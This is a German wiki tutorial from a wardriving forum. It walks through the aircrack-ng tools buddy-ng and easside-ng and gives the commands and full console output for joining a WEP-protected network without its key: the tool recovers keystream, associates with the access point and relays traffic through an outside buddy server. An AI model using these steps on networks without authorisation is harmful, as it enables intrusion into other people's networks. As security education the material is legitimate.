Buddy-ng

Aus Wardriving-Forum.de Enzyklopädie

Vergewissert euch dass die Karte mit airmon-ng in den monitor mode versetzt wurde.

Zuerst starten wir den Buddy Server. Dieser muss eine Verbindung zum Internet besitzen, er muss von dem System auf dem easside-ng läuft via TCP und vom AP via UDP erreichbar sein. Der Port 6969 darf nicht durch eine Firewall blockiert werden.

Starten des buddy sever:

buddy-ng

Das Programm antwortet:

buddy-ng
Waiting for connexion

Wenn easside-ng connected, sieht das dann in etwa so aus:

Got connection from 10.113.65.187
Handshake complete
Inet check by 10.113.65.187 1

Die IP 10.113.65.187 ist die IP des Systems auf dem easside-ng läuft.

Starte easside-ng:

  easside-ng -f ath0 -v 00:14:6C:7E:40:80 -c 9  -s 10.116.23.144

Erklärung:

-f ath0 Name des wireless Interfaces, -v 00:14:6C:7E:40:80 BSSID des Accesspoints, -c 9 Der Kanal auf dem das W-LAN Netz sendet, -s 10.116.23.144 die IP-Adresse des Buddy-Servers.

Das System antwortet:

Setting tap MTU
Sorting out wifi MAC
MAC is 00:08:D4:86:7E:98
Setting tap MAC
[14:40:06.596419] Ownin... SSID teddy Chan 9 Mac 00:14:6C:7E:40:80
Sending auth request
Authenticated
Sending assoc request
Associated: 1
Assuming ARP 54
[14:40:13.537842] Got 22 bytes of PRGA IV [4B:02:00]
[14:40:13.545021] Got 58 bytes of PRGA IV [4C:02:00]
[14:40:13.648670] Got 166 bytes of PRGA IV [4D:02:00]
[14:40:13.753087] Got 490 bytes of PRGA IV [4E:02:00]
[14:40:13.863819] Got 1462 bytes of PRGA IV [4F:02:00]
[14:40:13.966753] Got 1504 bytes of PRGA IV [50:02:00]
Assuming ARP 36
[15:23:42.047332] Guessing prga byte 22 with 16
ARP IP so far: 192
[15:23:42.749330] Guessing prga byte 23 with 3F
ARP IP so far: 192.168
[15:23:43.815329] Guessing prga byte 24 with 60
ARP IP so far: 192.168.1
My IP 192.168.1.123
Rtr IP 192.168.1.1
Sending who has 192.168.1.1 tell 192.168.1.123
Rtr MAC 00:14:6C:7E:40:80
Trying to connect to buddy: 10.116.23.144:6969
Connected
Handshake compl33t
Checking for internet... 1
Internet w0rx.  Public IP 10.113.65.187
Rtt 77ms

An diesem Punkt muss das tap-Interface gestartet werden:

ifconfig at0 up

Jetzt können Pakete via dem Netzwerk über das at0-Interface (192.168.1.0/24) gesendet und empfangen werden. Beachte, dass man hierfür keinen WEP-Schlüssel benötigt! Das TAP-Interface ist ein virtuelles Interface, dass sich so verhält als ob es ein Wireless Interface wäre, dass mit dem korrekten Schlüssel des Netzes arbeitet. Man kann ihm eine IP zuweisen, DHCP nutzen usw.. Standardmäßig wird dem at0-Interface eine IP im Subnetz 123 zugewiesen.

Beispiel:

Dieses Beispiel erläutert das Vorgehen auf einem bestimmten Kanal:

  easside-ng -f ath0 -s 10.116.23.144